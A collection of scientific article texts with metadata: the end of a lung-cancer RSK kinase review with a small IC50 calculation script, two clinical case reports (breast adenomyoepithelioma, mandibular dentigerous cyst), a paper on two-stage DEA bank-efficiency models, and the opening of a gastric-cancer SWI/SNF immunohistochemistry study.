anti-cancer agents in the lung cancer setting.
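The different ATP concentrations quoted above matter because, for an ATP-competitive inhibitor, the apparent IC50 rises with ATP concentration according to the Cheng-Prusoff relation, IC50 = Ki(1 + [ATP]/Km). The sketch below illustrates this; the Ki and Km values are assumed placeholders, not measured parameters of SL0101 or BI-D1870.

```python
# Hypothetical sketch of the Cheng-Prusoff relation for an ATP-competitive
# kinase inhibitor: IC50 = Ki * (1 + [ATP]/Km). Ki and Km are assumed
# placeholder values, used only to show how IC50 shifts with [ATP].
def ic50_competitive(ki_nM: float, atp_uM: float, km_atp_uM: float) -> float:
    """Apparent IC50 (nM) of a competitive inhibitor at a given [ATP]."""
    return ki_nM * (1.0 + atp_uM / km_atp_uM)

ki = 10.0        # assumed inhibition constant, nM
km_atp = 100.0   # assumed Km of the kinase for ATP, uM

for atp in (100.0, 10_000.0):  # 100 uM vs 10 mM ATP, as in the assays above
    print(f"[ATP] = {atp:g} uM -> predicted IC50 = "
          f"{ic50_competitive(ki, atp, km_atp):.0f} nM")
```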
Conclusion
RSKs are important downstream effectors of the Ras-Raf-MAPK signaling pathway. They play a crucial role in the regulation of cellular proliferation, growth, and survival in a variety of tumors. Based on recent advances in our understanding of the different RSK isoforms and the mechanisms by which they affect tumorigenesis, invasion and metastasis, these kinases might prove to be promising targets in the chemotherapy of lung adenocarcinomas, particularly those harboring oncogenic mutations in components of the Ras signaling pathway. | 2017-08-03T02:04:21.879Z | 2016-01-14T00:00:00.000 | {
"year": 2016,
"sha1": "26dfbd1ba1d6a5a9d05ff81fc08aca038fba8f6e",
"oa_license": "CCBY",
"oa_url": "https://translational-medicine.biomedcentral.com/track/pdf/10.1186/s12967-016-0768-1",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "665474227811b4caa336c49044f97e48e52db7aa",
"s2fieldsofstudy": [
"Biology",
"Medicine"
],
"extfieldsofstudy": [
"Biology",
"Medicine"
]
} |
72000932 | pes2o/s2orc | v3-fos-license | Malignant Adenomyoepithelioma of the Breast Presenting as a Large Mass that Grew Slowly without Metastasis
An adenomyoepithelioma (AME) is an uncommon neoplasm characterized by proliferation of both epithelial and myoepithelial cells in the salivary gland, skin, lung and breast. AMEs can recur, progress to malignancy and metastasize. A 68-year-old woman presented with a large mass occupying her whole right breast. The mass had grown slowly for about 20 years, and the preoperative biopsy of the mass suggested a chondroid syringoma. The mass was completely resected, and the postoperative biopsy revealed a malignant AME with a negative resection margin. The patient did not receive any adjuvant therapy and has been free of recurrence or metastasis to date. We report herein a case of a malignant AME diagnosed in the largest breast mass reported to date; the mass grew slowly and without metastasis. Clinicians should consider this rare disease entity in the differential diagnosis of a breast mass and remember the importance of complete excision of this tumor.
INTRODUCTION
An adenomyoepithelioma (AME) is characterized by a biphasic proliferation of both epithelial and myoepithelial cells. AME has been reported to occur in the breast, salivary gland, lung and skin (1). An AME of the breast is a rare tumor, and fewer than 200 such cases have been reported (2,3). Malignancy arising from an AME of the breast is much rarer, and only about 20 such cases have been reported in the literature (3,4). Metastasis of an AME is unusual, but this has been reported even in benign cases (5). The reported sizes of these tumors are mostly less than 5 cm. In this report, we describe a huge breast mass that was diagnosed as a malignant AME and was completely excised.
CASE REPORT
A 68-yr-old woman was transferred to our clinic for the treatment of a large mass in the right breast. She had no history of breast disease other than the mass and no history of medical disease except hypertension. The mass had grown slowly for about 20 yr, but the patient had not sought evaluation. As the mass grew, its center became ulcerated, leading to necrosis and a skin defect, but she had continued to dress the wound herself. She visited another hospital 1 week before she was referred to our hospital. A biopsy of the mass at the other hospital revealed a chondroid syringoma. The attending physician transferred her to our clinic in the hope that she could undergo a flap procedure after resection of the mass.
The mass was 15 cm at the maximal diameter, and it occupied the entire right breast (Figure 1A). The nipple and areola were absent as a result of the necrosis. The area of necrosis was approximately 8 cm at the maximal diameter. The mass was not fixed to the chest wall. No axillary lymph nodes were palpated. Neither mammography nor breast ultrasound was performed. The mass appeared as an opaque lesion on the chest X-ray. The pathologist at our hospital reviewed the slide of the biopsy specimen and made the diagnosis of myoepithelioma; no malignant component was identified on the slide.
We performed a total mastectomy of the right breast.
The skin was closed by primary repair after undermining, without a flap procedure (Figure 1B). Grossly, the tumor was a multinodular solid mass with focal cystic change.
The cut surface was pale yellow, soft to fish-flesh, and partly myxoid. It involved the overlying skin, and this resulted in skin ulceration (Figure 2). Microscopic examination showed a proliferation of epithelial cells invested by myoepithelial cells, forming a tubular or trabecular growth pattern (Figure 3). Multiple foci of the tumor showed cytologic atypia, increased mitotic activity and overgrowth of the glandular component (Figure 4). The final pathologic diagnosis was malignant AME. A negative resection margin was confirmed by the pathologic examination.
Immunohistochemical study demonstrated that the myoepithelial cells were reactive for smooth muscle actin (Figure 5), p63 and cytokeratin 5/6, partly reactive for S-100 protein, and negative for cytokeratin 7 and carcinoembryonic antigen, whereas the epithelial cells were positive for cytokeratin 7 and negative for myoepithelial markers. The Ki-67 index was increased, up to 10%. The tumor cells were intermediately positive for estrogen receptor and negative for progesterone receptor and c-erbB-2.
To our knowledge, this is the largest such tumor that has ever been reported. In this case, the tumor was presumed to have transformed to malignancy during its growth. The reported age range at the time of diagnosis is 26-80 yr. An AME in the male breast is extremely rare, and only three benign cases have been reported (13).
Figure 1. The preoperative (A) and postoperative (B) appearance of the right breast. (A) The necrotized area of the central portion was broad, and it included the nipple and areola. (B) The operative wound was clean without complications after complete excision of the mass and primary repair.

Figure 3. Microscopic finding of the tumor. The tumor showed vaguely nodular growth of proliferating epithelial cells invested by myoepithelial components forming tubules or trabeculae (H&E stain, ×40).

Figure 4. Microscopic finding of the tumor. Cytologic atypia with increased mitotic activity was evident in multiple foci of the glands (H&E stain, ×400).
The overall prognosis of AME is not known due to the rarity of the disease. An AME is a rare breast tumor with various clinical manifestations. We report here a case of a malignant AME that presented as a large tumor of the breast without distant metastasis; the tumor was completely excised, and we had misdiagnosed it preoperatively. Clinicians need to be aware of AMEs as part of the differential diagnosis of breast tumors, and they must be aware of the importance of complete excision because of the tumor's potential for recurrence and metastasis. Although surgery is the only proven treatment modality, treatment that includes chemotherapy, hormone therapy and radiation therapy may contribute to improving the prognosis of this disease entity.
Chemotherapy has been tried, but it is not effective (12). The effects of hormone therapy and radiotherapy are not proven. In the case of distant metastasis, local recurrence from incomplete excision is more common, and this contributes to a poor prognosis (4). | 2018-06-16T13:29:48.400Z | 2009-09-01T00:00:00.000 | {
"year": 2009,
"sha1": "c1735e6ed8d8d6665db6e97ea18545894c6a429f",
"oa_license": "CCBYNC",
"oa_url": "https://doi.org/10.4048/jbc.2009.12.3.219",
"oa_status": "GOLD",
"pdf_src": "ScienceParseMerged",
"pdf_hash": "c1735e6ed8d8d6665db6e97ea18545894c6a429f",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
21879752 | pes2o/s2orc | v3-fos-license | Management of a Dentigerous Cyst in a Child with Robin Sequence
This is a brief clinical report describing an 18-month-old female with Robin sequence found to have an incidental mandibular cystic lesion on a head computed tomography scan in the preoperative workup before performing mandibular distraction. She underwent enucleation of the tumor, which was found to be a dentigerous cyst. One year following cyst enucleation, mandibular distraction was performed in order to alleviate her tongue-based obstruction. This case demonstrates the ability of the mandibular bone to successfully regenerate after undergoing cyst enucleation.
INTRODUCTION
Dentigerous cysts (DCs) are the second most common type of odontogenic (developmental) cyst arising in the jaw [1]. They are defined as cystic lesions that develop around the crown of an unerupted tooth, in which follicle expansion allows for fluid accumulation. Also known as follicular cysts, DCs account for approximately 24% of true jaw cysts [2].
The most commonly affected teeth are the mandibular third molars and the maxillary canines, which may be explained by the tendency of these teeth to present with impaction [3]. DCs have a slight male predominance, and are most likely to occur during the second and third decades of life [4]. DCs diagnosed during childhood are rare, with most cases in the literature described in small series or case reports [4]. DCs are usually solitary in nature. When presenting as bilateral or multiple cysts, they are usually associated with syndromes such as mucopolysaccharidosis, basal cell nevus syndrome, or cleidocranial dysplasia [5].
Another uncommon jaw anomaly found in infancy is Robin sequence (RS). RS is characterized by micrognathia, cleft palate, and glossoptosis. The treatment of this condition frequently utilizes distraction osteogenesis to correct micrognathia. We present a brief clinical report of an incidental dentigerous cyst in a child with RS and its surgical management.
CASE
An 18-month-old female had undergone tracheostomy placement in infancy to treat an airway obstruction secondary to RS. The recommendation was to first correct the cleft palate, followed by mandibular distraction, in order to decannulate the child.
The cleft palate was closed at 19 months of age. A 2-flap palatoplasty with levator retropositioning was performed. The patient's postoperative course was uneventful. Two months following cleft palate closure, the patient was re-evaluated for mandibular distraction. A preoperative computed tomography (CT) scan demonstrated an incidental cystic lesion of the left mandibular ramus measuring 3.9 cm in length and 2.2 cm in the transverse dimension with a floating molar tooth. The mass was unilocular and distorted both cortices of the mandible. It appeared to be emanating from the second molar on the left side and extended to the level of the condyle. In order to obtain a definitive diagnosis, the decision was made to enucleate the mass.
At the age of 25 months, the patient underwent enucleation of the mandibular cyst. A subperiosteal exposure was performed. Upon making the osteotomy, copious amounts of yellow-colored, almost purulent fluid were expressed. The mass had obliterated both cortices of the bone. The floating teeth and surrounding bone were removed and curetted. The periosteum was intact and the only portion of viable bone was along the posterior border of the ramus. No bone grafting was performed (Figs. 1A, 2A). The intraoral incision healed without any complications and observation was recommended.
Surgical pathology identified the mass as a dentigerous cyst. Multiple sections revealed a cyst composed of dense fibrous tissue lined by squamous epithelium. Ameloblastic epithelium was not identified, and there was no evidence of carcinoma. Culture of the cyst aspirate showed the growth of many beta-hemolytic group F streptococci and possible anaerobic species. Also present were 2 molar-like tooth structures, which measured 1.1 cm × 1.0 cm × 0.6 cm and 1.1 cm × 0.9 cm × 1.2 cm, with the crown aspect of 1 of them projecting into the lumen of the cyst.
At 3 and a half years of age, the patient continued to demonstrate an inability to tolerate capping of the tracheostomy. An approximately 16-mm overjet was present centrally. The tongue remained posteriorly displaced. A CT scan showed a regenerated mandibular ramus that could accommodate a distraction (Figs. 1B, 2B). At that time, the patient underwent successful bilateral mandibular osteotomy and distraction. Approximately 2.5 months later, the internal distractors were removed. Two months later, she was decannulated. A follow-up CT scan performed 2 years postoperatively demonstrated bone stock after distraction (Fig. 2C).
DISCUSSION
The various theories on the histogenesis of dentigerous cysts include developmental and inflammatory origins. The developmental origin is associated with an unerupted tooth exerting pressure on a follicle, impeding venous return, and in turn allowing for cystic fluid accumulation to develop between the reduced enamel epithelium. It has also been suggested that the inflammation of deciduous teeth in nearby proximity to an unerupted tooth can trigger cyst formation. This process is usually seen in the first and second decades of life [6]. Nevertheless, DCs do occur in childhood, although they are uncommon. Only 9.1% of DCs occur in the 6-to 7-year-old population [7]. The diagnosis of a DC in our patient at 21 months represents one of the few diagnoses to be reported in the literature in such a young patient [8]. Most commonly, DCs present as asymptomatic mandibular swellings, but they may also present with unilateral jaw pain when they are inflammatory in nature. In this patient, the DC was incidentally found on a preoperative CT scan in anticipation of mandibular distraction. In a retrospective review of prior imaging, evidence of the lesion was identified. An approximately 14-mm unilocular lucency in the left mandible was present on a chest X-ray for tracheostomy placement at 13 months of age (Fig. 3). All other imaging prior to this date did not elucidate the mandible well.
It is difficult to discern the origin of the cyst in this patient. The lower second molars typically erupt at 23-31 months [9]. It is possible that the unerupted tooth in this location exerted pressure on an impacted follicle, leading to fluid accumulation and eventual cyst formation. With evidence of the cyst on imaging at 13 months, a developmental origin could explain its presence. The other possibility would be an inflammatory origin. Our patient had been admitted for multiple upper respiratory tract infections requiring intensive care unit hospitalization. The final pathology report demonstrated the presence of beta-hemolytic group F streptococci, suggesting an underlying infection. It is possible that the underlying inflammation of a non-vital deciduous tooth or infection from another source spread to involve the follicle of an unerupted tooth, resulting in inflammatory debris and eventual cyst formation [6].
Radiographically, DCs appear as a well-defined unilateral radiolucency surrounding the crown of an unerupted tooth. A follicular space of > 4 mm is suspicious for an underlying cyst. Other odontogenic lesions exist with similar radiographic findings. The differential diagnosis includes radicular cysts, ameloblastoma, squamous cell carcinoma, chondrosarcoma, osteosarcoma, cementoblastoma, and Pindborg tumor. The complications that can arise from untreated DCs include pathologic bone fracture/destruction, loss of permanent teeth, and permanent bone deformation, leading to facial asymmetry and the displacement of teeth [10]. Debate currently centers around whether marsupialization or enucleation is the best treatment modality in the management of DCs. Enucleation is the treatment of choice, in which the cyst and all of its contents are removed in toto. This is the preferred method if supernumerary teeth are involved, and if this is the case, the unerupted tooth is also removed. The disadvantages of enucleation include the potential to affect budding teeth, especially in children. Therefore, marsupialization is often the preferred method in children, as the loss of permanent tooth buds can be prevented [4]. This more conservative approach involves decompressing the cyst and suturing its lining to the oral mucosa to allow for continuous drainage. The obvious disadvantage of this technique is the potential for cyst recurrence as well as for pathologic tissue to be left in situ [11]. Our patient presented a unique challenge in that the cyst was quite large (4 cm) and had replaced almost all of the mandibular ramus. It was apparent that the mass had obliterated the bone, on both the lingual and buccal cortices. Fortunately, after the mass was removed, viable bone was present along the posterior edge of the ramus connecting to the body and condyle, and the periosteum was intact.

Fig. 3. Incidental finding of dentigerous cyst. Chest X-ray for tracheostomy placement demonstrating a 14-mm unilocular lucency in the left mandible at 13 months of age. The red arrow marks the cyst.

Fig. 2. CT scan before and after mandibular distraction. (A) Computed tomography (CT) scan demonstrating a large cystic lesion of the left mandibular ramus. The cyst is shown by a red arrow. (B) CT scan at the age of 3.5 years (18 months after enucleation) demonstrating loss of the second molar but adequate bone formation. (C) CT scan performed 2 years after bilateral mandibular osteotomy and distraction.
Spontaneous regeneration of the mandible is an infrequent response that has been reported in the literature. While the exact mechanism is not fully understood, some of the factors thought to contribute to bone formation include the presence of an intact periosteum, age of the patient, infection, and immobility [12].
The presence of an intact periosteum is perhaps one of the most important factors contributing to osteogenesis. The periosteum is a layer of dense connective tissue that is attached to the adjacent bone via stable collagenous fibers known as Sharpey fibers. It consists of 2 layers: an outer fibrous layer and an inner cambium layer. The outer layer consists of fibroblasts and a vascular network. The inner layer contains osteoblasts, which play a crucial role in stimulating osteogenesis. When the periosteum is stripped from the bone, it is this layer, along with its osteogenic cells, that can provide a scaffold to promote spontaneous bone regeneration and healing [13].
The age of the patient is another important factor that contributes to mandibular bone regeneration. The majority of reported cases have been in young patients. The younger the patient, the more dense and vascular the periosteum. Increased vascularity brings the potential of improved osteogenesis. Incidentally, infection is also thought to jumpstart osteoblasts into triggering osteogenesis [14]. This corresponds to what took place in our patient, who was found to have an underlying infection in the cyst. Finally, immobilization has been predicted to contribute to bone formation [15]. A posterior edge of bone did remain present along the ramus, and would have provided the appropriate stabilization necessary for osteogenesis to occur.
Our patient underwent enucleation in the setting of known plans for mandibular distraction for RS. Initial follow-up X-rays did demonstrate thinning of the lateral cortex of the ramus, but this improved with time. CT imaging performed nearly 18 months after cyst enucleation demonstrated good overall bone formation (Fig. 2B). More impressive was the ability of the bone to regenerate following distraction. This case demonstrates the ability of the mandible to successfully regenerate after extensive cyst enucleation and bone removal, most likely secondary to an intact periosteum. It emphasizes the capacity of the pediatric population to undergo enucleation and also suggests that clinicians can be relatively aggressive in the surgical management of DCs when necessary.
In conclusion, DCs are benign mandibular cysts infrequently seen in the younger population. When a unilocular radiolucency is seen on imaging, the differential diagnosis should be broad and include possible malignant etiologies. Enucleation is the preferred treatment and may be employed even in instances where future mandibular distraction may be needed, such as in the case of patients with RS. | 2018-04-03T02:26:42.884Z | 2017-09-01T00:00:00.000 | {
"year": 2017,
"sha1": "c4a6c566ac0dc2791e872afcd856039728acde39",
"oa_license": "CCBYNC",
"oa_url": "http://www.e-aps.org/upload/pdf/aps-2017-44-5-434.pdf",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "c4a6c566ac0dc2791e872afcd856039728acde39",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
234904255 | pes2o/s2orc | v3-fos-license | Two-stage DEA for Bank Efficiency Evaluation Considering Shared Input and Unexpected Output Factors
With increasingly fierce market competition, enterprises can survive only by relying on high-quality products and high customer satisfaction. Among the many evaluation methods, Data Envelopment Analysis (DEA), a non-parametric statistical method for effectively handling multi-input, multi-output problems, has received increasing attention for evaluating the relative efficiency of decision-making units. When evaluating bank efficiency with the DEA method, banks may exhibit both dual-role factors and unexpected (i.e., undesirable) output factors. The two-stage DEA model provides an effective analytical method for evaluating the efficiency of banks with complex organizational structures. To evaluate efficiency with unexpected outputs under uncertain information, a stochastic DEA model with unexpected outputs is established.
Introduction
The evaluation and selection of bank efficiency is the process of selecting the most efficient bank by comprehensively comparing capital turnover and customer satisfaction; it is a typical multi-objective, multi-criteria decision-making problem [1]. Whether for an enterprise acting as a node in a supply chain or for a non-profit organization such as a government, hospital, or school, success depends heavily on the bank efficiency evaluation and selection process [2]. In practice, the values of the evaluation criteria may be not only precise quantitative values but also imprecise estimates, ordinal values, or linguistic variables [3]. Because of the importance of bank efficiency evaluation and selection, the associated decisions have attracted extensive attention and research. Among the many evaluation methods, Data Envelopment Analysis (DEA), a non-parametric method for effectively handling multi-input, multi-output problems, has received growing attention for evaluating the relative efficiency of decision-making units [4]. Traditional DEA models assume deterministic data, but in practice, measurement error and the randomness of economic processes produce imprecise data.
Bank efficiency has an important impact on the performance of core enterprises and of the entire supply chain, so an efficient and realistic model for bank efficiency evaluation and selection is needed. DEA is well suited to effectiveness evaluation among units of the same type with multiple inputs and outputs, and it has notable advantages for bank selection problems [5]. Because fuzzy mathematics can mathematically express the uncertainty and ambiguity involved in decisions based on approximate information, and provides formal tools for handling inherent imprecision, fuzzy DEA has clear advantages for bank efficiency evaluation with fuzzy index values [6]. The advantages of DEA in bank efficiency evaluation are evident: it can process multiple indicators simultaneously without weights being specified in advance, and, after the evaluation, the direction of improvement for each bank can be obtained by projection onto the efficient frontier [7]. When using DEA to evaluate bank efficiency, the input and output elements must first be determined; although the role of some elements is obvious, others are ambiguous as to whether they are inputs or outputs [8]. The two-stage DEA model provides an effective analysis method for evaluating the efficiency of banks with complex organizational structures.
DEA Model Introduction and Efficiency Evaluation
In production practice, producers naturally want to use as little input as possible and obtain as much output as possible. As long as dual-role elements exist in a system, the system can be decomposed into multiple subsystems. The DEA method generally assumes that less input and more output are better, which implicitly assumes that all outputs are desired by decision makers. In actual production activities, inputs and outputs play different roles, and to compare and evaluate units, input and output data must be integrated; an analysis method that can effectively integrate them is therefore needed. A production system containing dual-role elements can be decomposed into subsystems in which the dual-role elements serve as intermediate variables between two subsystems. In real multi-stage production networks, undesirable outputs such as environmental pollutants often arise [9]. In that case, a technology that produces more desirable output and less undesirable output with relatively less resource input can serve as the criterion for judging whether a production decision-making unit is efficient. Because the traditional DEA model implicitly assumes that all outputs are desirable, the inefficiency of an evaluated decision-making unit (DMU) may come from two sources.
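To make the "least input, most output" idea concrete, the following is a minimal sketch of the classical input-oriented CCR efficiency score, min θ subject to Xλ ≤ θx₀, Yλ ≥ y₀, λ ≥ 0, solved as a linear program. Python with SciPy and the column-per-DMU data layout are illustrative assumptions, not part of the paper.

```python
import numpy as np
from scipy.optimize import linprog

def ccr_efficiency(X, Y, j0):
    """Input-oriented CCR efficiency of DMU j0.
    X: (m, n) input matrix, Y: (s, n) output matrix; columns are DMUs."""
    m, n = X.shape
    s = Y.shape[0]
    # decision vector: [theta, lambda_1, ..., lambda_n]
    c = np.zeros(1 + n)
    c[0] = 1.0                                  # minimize theta
    # X @ lam - theta * x0 <= 0
    A1 = np.hstack([-X[:, [j0]], X])
    b1 = np.zeros(m)
    # -Y @ lam <= -y0, i.e., Y @ lam >= y0
    A2 = np.hstack([np.zeros((s, 1)), -Y])
    b2 = -Y[:, j0]
    res = linprog(c, A_ub=np.vstack([A1, A2]), b_ub=np.concatenate([b1, b2]),
                  bounds=[(0, None)] * (1 + n), method="highs")
    return res.fun                              # theta* in (0, 1]
```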
The traditional DEA model does not consider the internal structure of a DMU and treats the whole DMU as a black box, whereas the two-stage DEA model depicts the two-stage system and seeks the relationship between the system and its subsystems. The idea of DEA efficiency evaluation is to achieve as much output as possible with as little input as possible, and on this basis to evaluate the relative effectiveness of all decision-making units. Assume there are n decision-making units whose operations can be divided into two stages or processes, as shown in Fig. 1.
Fig. 1 Two-stage system
Suppose the production system has $n$ decision-making units, and each DMU has three vectors: an input vector $x \in \mathbb{R}^{m}$, a desirable output vector $y^{g} \in \mathbb{R}^{s_1}$, and an undesirable output vector $y^{b} \in \mathbb{R}^{s_2}$. Collecting these into the matrices $X=[x_1,\dots,x_n]$, $Y^{g}=[y_1^{g},\dots,y_n^{g}]$, and $Y^{b}=[y_1^{b},\dots,y_n^{b}]$, the production possibility set $P$ can be defined as

$$P=\left\{(x,y^{g},y^{b}) \mid x \ge X\lambda,\; y^{g} \le Y^{g}\lambda,\; y^{b} \ge Y^{b}\lambda,\; \lambda \ge 0\right\}.$$

The SBM model with undesired output is

$$\rho^{*}=\min \frac{1-\dfrac{1}{m}\sum_{i=1}^{m} s_i^{-}/x_{i0}}{1+\dfrac{1}{s_1+s_2}\left(\sum_{r=1}^{s_1} s_r^{g}/y_{r0}^{g}+\sum_{r=1}^{s_2} s_r^{b}/y_{r0}^{b}\right)}$$

subject to $x_0=X\lambda+s^{-}$, $y_0^{g}=Y^{g}\lambda-s^{g}$, $y_0^{b}=Y^{b}\lambda+s^{b}$, and $s^{-},s^{g},s^{b},\lambda \ge 0$. Here $s=(s^{-},s^{g},s^{b})$ are the slack (relaxation) variables, $\lambda$ is a weight vector, and the objective function value $\rho$ is strictly decreasing with respect to each slack.
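The fractional SBM program above can be solved as a linear program after the standard Charnes-Cooper transformation (multiply through by a scalar $t>0$ and linearize). The sketch below is an illustration only, assuming Python/SciPy, strictly positive data, and the column-per-DMU layout used in the previous sketch.

```python
import numpy as np
from scipy.optimize import linprog

def sbm_undesirable(X, Yg, Yb, j0):
    """SBM efficiency with undesirable outputs for DMU j0, linearized by the
    Charnes-Cooper transformation. X: (m, n) inputs, Yg: (s1, n) desirable
    outputs, Yb: (s2, n) undesirable outputs; columns index the n DMUs."""
    m, n = X.shape
    s1, s2 = Yg.shape[0], Yb.shape[0]
    x0, yg0, yb0 = X[:, j0], Yg[:, j0], Yb[:, j0]
    # variable layout: [t, Lam (n), Sm (m), Sg (s1), Sb (s2)]
    nv = 1 + n + m + s1 + s2
    iL, iSm, iSg, iSb = 1, 1 + n, 1 + n + m, 1 + n + m + s1
    c = np.zeros(nv)
    c[0] = 1.0
    c[iSm:iSg] = -1.0 / (m * x0)          # objective: t - (1/m) sum Sm_i/x_i0
    A_eq = np.zeros((1 + m + s1 + s2, nv))
    b_eq = np.zeros(1 + m + s1 + s2)
    # normalization: t + (1/(s1+s2)) (sum Sg_r/yg_r0 + sum Sb_r/yb_r0) = 1
    A_eq[0, 0] = 1.0
    A_eq[0, iSg:iSb] = 1.0 / ((s1 + s2) * yg0)
    A_eq[0, iSb:] = 1.0 / ((s1 + s2) * yb0)
    b_eq[0] = 1.0
    # inputs: x0 * t - X Lam - Sm = 0
    A_eq[1:1+m, 0] = x0
    A_eq[1:1+m, iL:iSm] = -X
    A_eq[1:1+m, iSm:iSg] = -np.eye(m)
    # desirable outputs: yg0 * t - Yg Lam + Sg = 0
    A_eq[1+m:1+m+s1, 0] = yg0
    A_eq[1+m:1+m+s1, iL:iSm] = -Yg
    A_eq[1+m:1+m+s1, iSg:iSb] = np.eye(s1)
    # undesirable outputs: yb0 * t - Yb Lam - Sb = 0
    A_eq[1+m+s1:, 0] = yb0
    A_eq[1+m+s1:, iL:iSm] = -Yb
    A_eq[1+m+s1:, iSb:] = -np.eye(s2)
    res = linprog(c, A_eq=A_eq, b_eq=b_eq, bounds=[(0, None)] * nv,
                  method="highs")
    return res.fun                         # rho* in (0, 1]
```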
In actual production practice, the pursuit of desirable output is accompanied by the production of undesirable by-products. Policymakers can, of course, simply ignore these factors when evaluating bank efficiency, but the results will then differ greatly from reality. When applying the DEA method, desirable and undesirable outputs must be treated differently. Only by decomposing the system and applying the two-stage DEA method to solve for the efficiency of the entire system and of its subsystems can the efficiency of a system containing dual-role elements be measured reasonably and correctly. Research on DEA models focuses mainly on the evaluation and ranking of input-output indicators and relative efficiency, and it is inevitable that several decision-making units obtain the same efficiency value of one and cannot be fully ranked. Under the DEA framework, there are several ways to deal with undesirable output: treating it as an input, applying a monotonically decreasing transformation and using the transformed variable as an output, or using the directional distance function, among others.
DEA Model for Evaluating Bank Efficiency with Unexpected Output
Unexpected output exists in the bank selection process. Only by minimizing the undesirable output can the goal of producing as much desirable output as possible with the least input be satisfied. When multiple decision-making units are efficient in a DEA model and all DMUs need to be fully ranked, there are two ways to resolve the problem. In the new model, a decision-making unit is efficient as a whole if and only if both stages are efficient. Introducing the undesirable output factor into the SBM model yields the undesirable-output SBM model, which resolves both the slack problem of inputs and outputs and the efficiency evaluation problem under undesirable output. Finally, the model is applied to the bank efficiency evaluation of a company.
In the actual production process, less input and less undesirable output are expected at each stage or department, while more desirable output is better. Each department allocates resources according to its importance so as to improve the overall efficiency of the decision-making unit. The whole production process is divided into $K$ stages. In stage $k$, with input matrix $X^{k}$ and output matrix $Y^{k}$, the production possibility set under the premise of constant returns to scale can be expressed as

$$P^{k}=\left\{(x^{k},y^{k}) \mid x^{k} \ge X^{k}\lambda,\; y^{k} \le Y^{k}\lambda,\; \lambda \ge 0\right\}.$$

Because the performance of the whole production process is the synthesis of the two stages' performance, the model can decompose overall efficiency into two stage efficiencies, helping management or decision makers identify the stage in which the root cause of overall inefficiency occurs and take targeted measures to improve that stage's efficiency. For multi-product, multi-customer production enterprises, in order to meet the needs of different customers, the enterprise must hold corresponding inventories, allocate goods according to customers' requirements for variety and quantity, and deliver them to the designated place at the designated time [10]. When the inputs or outputs are interval values, the DEA method used is called the interval DEA method, in which the efficiency value of a DMU is an interval number. In the actual evaluation and selection of bank efficiency, the input and output data may be interval values rather than precise values, owing to the selected index attributes, incomplete information, and the need for prediction.
Conclusions
The existence of undesirable output is an unavoidable fact. With either the significance level or the expected efficiency value held fixed, the optimal value increases as the other index increases, which provides decision makers with more effective information for evaluating decision units in practice. Existing DEA models that consider undesirable factors require the corresponding index values to be precise, which inevitably limits their practicality. This paper establishes a two-stage DEA cross-efficiency model for bank efficiency evaluation with dual-role variables and undesirable output factors. In the actual evaluation and selection of bank efficiency, because some evaluation indexes are uncertain, or are made uncertain by external factors, the obtained index values are often interval values rather than precise values. The new model can evaluate the overall efficiency of a decision-making unit with a multi-stage production process in the presence of undesirable output, and can decompose it to obtain the efficiency value of each stage, thereby evaluating the performance of every stage.
Comprehensive Immunohistochemical Study of the SWI/SNF Complex Expression Status in Gastric Cancer Reveals an Adverse Prognosis of SWI/SNF Deficiency in Genomically Stable Gastric Carcinomas
Simple Summary
This study aimed to investigate the clinical relevance of immunohistochemical expression of the SWI/SNF complex proteins SMARCA2, SMARCA4, SMARCB1, ARID1A, ARID1B, and PBRM1 in 477 adenocarcinomas of the stomach and gastroesophageal junction. Additionally, the tumors were classified immunohistochemically in analogy to The Cancer Genome Atlas (TCGA) classification. Overall, 32% of cases demonstrated aberrant expression of the SWI/SNF complex. SWI/SNF aberration emerged as an independent negative prognostic factor for overall survival in all patients and in genomically stable patients in analogy to TCGA. In conclusion, determination of SWI/SNF status could be suggested in routine diagnostics in genomically stable tumors to identify patients who might benefit from new therapeutic options.

Abstract
The SWI/SNF complex has important functions in the mobilization of nucleosomes and consequently influences gene expression. Numerous studies have demonstrated that mutations or deficiency of one or more subunits can have an oncogenic effect and influence the development, progression, and eventual therapy resistance of tumor diseases. Genes encoding subunits of the SWI/SNF complex are mutated in approximately 20% of all human tumors. This study aimed to investigate the frequency, association with clinicopathological characteristics, and prognosis of immunohistochemical expression of the SWI/SNF complex proteins SMARCA2, SMARCA4, SMARCB1, ARID1A, ARID1B, and PBRM1 in 477 adenocarcinomas of the stomach and gastroesophageal junction. Additionally, the tumors were classified immunohistochemically in analogy to The Cancer Genome Atlas (TCGA) classification. Overall, 32% of cases demonstrated aberrant expression of the SWI/SNF complex. Complete loss of SMARCA4 was detected in three cases (0.6%) and was associated with adverse clinical characteristics. SWI/SNF aberration emerged as an independent negative prognostic factor for overall survival in genomically stable patients in analogy to TCGA. In conclusion, determination of SWI/SNF status could be suggested in routine diagnostics in genomically stable tumors to identify patients who might benefit from new therapeutic options.
Introduction
Gastric cancer is the sixth-most-common cancer entity worldwide, having accounted for approximately 780,000 cancer-associated deaths in 2018 [1]. So far, the best parameter for predicting prognosis, and therefore for guiding therapy, in gastric-cancer patients is TNM staging. The factors relevant for determining the prognosis of gastric carcinomas are local infiltration depth, locoregional lymph node involvement, distant metastases, and vascular invasion [2][3][4]. Additionally, diffuse Laurén subtype and proximal tumor localization are known negative prognostic factors [5][6][7]. The introduction of perioperative chemotherapy after 2005 has improved the outcome of stage two and three gastric cancers, with a median survival of 50 months vs. 34 months [8]. However, the prognosis of gastric cancer remains poor, and five-year survival rates did not change between 2000 and 2014, remaining between 31.4% and 33.5% in Germany [9].
Two generally accepted molecular classifications have been proposed for gastric carcinomas, which have both prognostic and therapeutic implications, namely The Cancer Genome Atlas (TCGA) and the Asian Cancer Research Group (ACRG) classification [10,11]. So far, only a few prognostic and therapeutic biomarkers have been identified for gastric cancer. To date, the most important therapeutic marker in gastric carcinoma is HER2 overexpression [12]. In addition, MSI status and high PDL1 expression are independent positive prognostic factors in gastric carcinoma [13][14][15], while aberrant E-cadherin expression is considered an unfavorable prognostic factor and even a negative predictive factor for chemotherapy response [16].
